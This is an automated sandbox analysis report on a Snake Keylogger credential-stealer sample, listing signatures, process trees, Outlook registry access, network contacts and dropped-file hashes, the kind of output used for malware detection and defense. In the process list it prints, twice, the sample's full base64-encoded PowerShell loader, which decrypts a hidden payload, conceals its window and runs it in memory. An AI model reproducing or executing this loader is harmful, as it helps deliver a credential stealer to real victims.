Malware Analysis Report

2024-10-18 23:14

Sample ID 240514-bnfvnadh36
Target 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
SHA256 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a
Tags
snakekeylogger collection execution keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a

Threat Level: Known bad

The file 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe was found to be: Known bad.

Malicious Activity Summary

snakekeylogger collection execution keylogger stealer

Snake Keylogger payload

Snake Keylogger

Detects executables with potential process hoocking

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables packed with or use KoiVM

Detects executables referencing many email and collaboration clients. Observed in information stealers

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Unsigned PE

Command and Scripting Interpreter: PowerShell

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

outlook_win_path

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-14 01:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-14 01:17

Reported

2024-05-14 01:20

Platform

win7-20240508-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe

"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-14 01:17

Reported

2024-05-14 01:20

Platform

win10v2004-20240426-en

Max time kernel

136s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"

Signatures

Snake Keylogger

stealer keylogger snakekeylogger

Snake Keylogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables packed with or use KoiVM

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables referencing many email and collaboration clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables with potential process hoocking

Description Indicator Process Target
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3932 set thread context of 2896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 228 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe C:\Windows\system32\cmd.exe
PID 3996 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 1912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3932 wrote to memory of 1912 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1912 wrote to memory of 5072 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1912 wrote to memory of 5072 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3932 wrote to memory of 2896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe

"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0AEEALAAwAHgAMAA0ACwAMAB4AEUARgAsADAAeAA4ADUALAAwAHgAMwA4ACwAMAB4ADkAMAAsADAAeABGAEUALAAwAHgANAA4ACwAMAB4ADQANgAsADAAeABGADIALAAwAHgAMgA5ACwAMAB4AEEARQAsADAAeABBADkALAAwAHgAOAA2ACwAMAB4ADcAQQAsADAAeAA1ADcALAAwAHgANQBCACwAMAB4AEEANgAsADAAeABCADEALAAwAHgANAAwACwAMAB4ADgAQQAsADAAeABFADEALAAwAHgAMAAwACwAMAB4ADMANAAsADAAeAA5AEQALAAwAHgARQA2ACwAMAB4ADMAMwAsADAAeAA3ADQALAAwAHgARQBEACwAMAB4ADIAMgAsADAAeABEADMALAAwAHgAMABFACkACgAkABFUz5EgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADQALAAwAHgAQwA3ACwAMAB4ADAAMwAsADAAeAA2ADcALAAwAHgAMQBFACwAMAB4AEYAQQAsADAAeAAyADcALAAwAHgAQgBBACwAMAB4ADEANQAsADAAeABDADEALAAwAHgAQgBCACwAMAB4AEQANAAsADAAeAA3AEEALAAwAHgANQA0ACwAMAB4ADkANQAsADAAeAA3ADgAKQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAKAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAJCWz4WXeuNTIAB7AAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACIAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgALeD1lNTX01Sl3rjUygAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAaABvAHcAVwBpAG4AZABvAHcAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIAA+Zjp5l3rjUygASQBuAHQAUAB0AHIAIACXeuNT5VPEZywAIABpAG4AdAAgAH1U5E4pADsACgAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIACQls+FU19NUpd641MoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAA5VPEZyAAPQAgALeD1lNTX01Sl3rjUygAKQA7AAoAIAAgACAAIAAgACAAIAAgAD5mOnmXeuNTKADlU8RnLAAgADAAKQA7AAoAIAAgACAAIAB9AAoAfQAKACIAQAAgAC0ATABhAG4AZwB1AGEAZwBlACAAQwBTAGgAYQByAHAACgAKAFsAkJbPhZd641NdADoAOgCQls+FU19NUpd641MoACkACgAKACQAh2X2Tu+NhF8gAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGoAbQBkADgAOAB2AHkAaQBwAC4AdABtAHAAJwA7AAoAJACgUsZbV1uCgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJACHZfZO742EXykAOwAKACQA44nGW4VRuVsgAD0AIADjicZbIAAtAKWUGVMgACQApZQZUyAALQARVM+RIAAkABFUz5EgAC0AcGVuYyAAJACgUsZbV1uCggoACgAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACQAZVHjU7lwIAA9ACAAJAALeo9expYuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZVHjU7lwLgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAOwAKAA=="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0AEEALAAwAHgAMAA0ACwAMAB4AEUARgAsADAAeAA4ADUALAAwAHgAMwA4ACwAMAB4ADkAMAAsADAAeABGAEUALAAwAHgANAA4ACwAMAB4ADQANgAsADAAeABGADIALAAwAHgAMgA5ACwAMAB4AEEARQAsADAAeABBADkALAAwAHgAOAA2ACwAMAB4ADcAQQAsADAAeAA1ADcALAAwAHgANQBCACwAMAB4AEEANgAsADAAeABCADEALAAwAHgANAAwACwAMAB4ADgAQQAsADAAeABFADEALAAwAHgAMAAwACwAMAB4ADMANAAsADAAeAA5AEQALAAwAHgARQA2ACwAMAB4ADMAMwAsADAAeAA3ADQALAAwAHgARQBEACwAMAB4ADIAMgAsADAAeABEADMALAAwAHgAMABFACkACgAkABFUz5EgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADQALAAwAHgAQwA3ACwAMAB4ADAAMwAsADAAeAA2ADcALAAwAHgAMQBFACwAMAB4AEYAQQAsADAAeAAyADcALAAwAHgAQgBBACwAMAB4ADEANQAsADAAeABDADEALAAwAHgAQgBCACwAMAB4AEQANAAsADAAeAA3AEEALAAwAHgANQA0ACwAMAB4ADkANQAsADAAeAA3ADgAKQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAKAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAJCWz4WXeuNTIAB7AAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACIAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgALeD1lNTX01Sl3rjUygAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAaABvAHcAVwBpAG4AZABvAHcAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIAA+Zjp5l3rjUygASQBuAHQAUAB0AHIAIACXeuNT5VPEZywAIABpAG4AdAAgAH1U5E4pADsACgAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIACQls+FU19NUpd641MoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAA5VPEZyAAPQAgALeD1lNTX01Sl3rjUygAKQA7AAoAIAAgACAAIAAgACAAIAAgAD5mOnmXeuNTKADlU8RnLAAgADAAKQA7AAoAIAAgACAAIAB9AAoAfQAKACIAQAAgAC0ATABhAG4AZwB1AGEAZwBlACAAQwBTAGgAYQByAHAACgAKAFsAkJbPhZd641NdADoAOgCQls+FU19NUpd641MoACkACgAKACQAh2X2Tu+NhF8gAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGoAbQBkADgAOAB2AHkAaQBwAC4AdABtAHAAJwA7AAoAJACgUsZbV1uCgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJACHZfZO742EXykAOwAKACQA44nGW4VRuVsgAD0AIADjicZbIAAtAKWUGVMgACQApZQZUyAALQARVM+RIAAkABFUz5EgAC0AcGVuYyAAJACgUsZbV1uCggoACgAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACQAZVHjU7lwIAA9ACAAJAALeo9expYuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZVHjU7lwLgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAOwAKAA==

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ha2fknko\ha2fknko.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5CD5.tmp" "c:\Users\Admin\AppData\Local\Temp\ha2fknko\CSC89ACB1CE5D8B40638E6CFC2FB9D17C36.TMP"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 scratchdreams.tk udp
US 104.21.27.85:443 scratchdreams.tk tcp
US 8.8.8.8:53 85.27.21.104.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 21.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3932-2-0x00007FFC216D3000-0x00007FFC216D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_foeig5pp.qrb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3932-4-0x000001902F7C0000-0x000001902F7E2000-memory.dmp

memory/3932-13-0x00007FFC216D0000-0x00007FFC22191000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ha2fknko\ha2fknko.0.cs

MD5 2d582d49bc5da0270e19e27903336497
SHA1 01065a81afc9e4ec356ef1998ec15535f7ea5d09
SHA256 1104ec9aaa6d72466e966359f4e147da4a11ac8ba4c1d36f45fdf83ee76e16dc
SHA512 03ef2d744cc6152d5723574d34bf06c5bd65264999e8eade3e48159367fb05067cd071ee37225947ff4b9286d0f11b6963e2d42a1e9c26a3ffc47b76bbf3a5e6

C:\Users\Admin\AppData\Local\Temp\RES5CD5.tmp

MD5 f69b126321b2461b146fcbb4e7b909e8
SHA1 811bb1f45085e6e6d9ed54719a6de5cda27cdd64
SHA256 892dccac2e71472da160254e15c11e949f2f3fbc9c46578df8873a5707b7c3fc
SHA512 e1dccd0b3b3434de28e0d1cfe8c4dd6f791dd600bcc9f8ada49be97c317ff43ebfa5f760459eeae3687278bdf009b8fc8f1e379aeff3007347c7b0e27a764ded

C:\Users\Admin\AppData\Local\Temp\file-jmd88vyip.tmp

MD5 fec0ee7beb18cfe6da97e99a57898163
SHA1 f9bfefcfe79858383586541d2ec250e0060fc42c
SHA256 301f949a952c4705d69f2d7fcaf13e7055542142d249f7e57793c3548f1c56f7
SHA512 2a263c00c95654c7b0ab784f372d59183bf21132ddf4a39a4935cf17a98e1b760fc26ed217c415d1ddeeac8595477e1503fd917d8b878771da7a9501c3c29362

memory/3932-30-0x0000019031C30000-0x0000019031C3A000-memory.dmp

memory/3932-27-0x0000019031C20000-0x0000019031C28000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ha2fknko\ha2fknko.dll

MD5 107bbe27554d1bdd9f9f4e1475153cc4
SHA1 b7163ef0d7cd1c217c2614d264fa822450cb0d20
SHA256 41518603317cdae8e4bba16527224e3c2f5ae6210003b384929d4e24441f58b1
SHA512 5e53e487139c8b11cfd710851c5c862914c87d741c298d48c1d3d2e64f2b4de9b0381eeed9ff78bc9c99803e9dc3feddc60340fe5aa4201775da57a4398e5f7c

\??\c:\Users\Admin\AppData\Local\Temp\ha2fknko\CSC89ACB1CE5D8B40638E6CFC2FB9D17C36.TMP

MD5 4347b0508841d3e260f5ee7bd425e02c
SHA1 d39c6a1dae168d2bd576c2adce0d3cb44b05c900
SHA256 e84257f8590c0f3c83ce20aaa934212b7c7d26db549f66b7fb9f965fee67a428
SHA512 195a2ba2783364611e6356f9f8d6c5e8f8d39e7965c2af286841be5bd4426fd1d79bf38f35fe8165e105ef77256f74ed72ce792fce641fa14bca786789af3ec4

\??\c:\Users\Admin\AppData\Local\Temp\ha2fknko\ha2fknko.cmdline

MD5 33b777cbde458906aef2afc3416ec74a
SHA1 632fe15f52269595f5c1089ec14d13d9eb5dda33
SHA256 5829454223d3bcb85c080953a2064d1389a6be87fba20117e5eb072028aad009
SHA512 102ce199453dbb77d07c31e721ccaf95ddbdbc1e8ca13697218206661fba3cf3c4983d46ffa591047d37f22f8f9111aa71d3796dce88391ae1d4a340b54e0e29

memory/3932-14-0x00007FFC216D0000-0x00007FFC22191000-memory.dmp

memory/3932-31-0x00007FFC216D0000-0x00007FFC22191000-memory.dmp

memory/3932-32-0x0000019031DB0000-0x0000019031E2A000-memory.dmp

memory/2896-33-0x0000000000400000-0x0000000000426000-memory.dmp

memory/2896-34-0x00000000058E0000-0x0000000005E84000-memory.dmp

memory/2896-35-0x0000000005330000-0x00000000053CC000-memory.dmp

memory/3932-36-0x00007FFC216D3000-0x00007FFC216D5000-memory.dmp

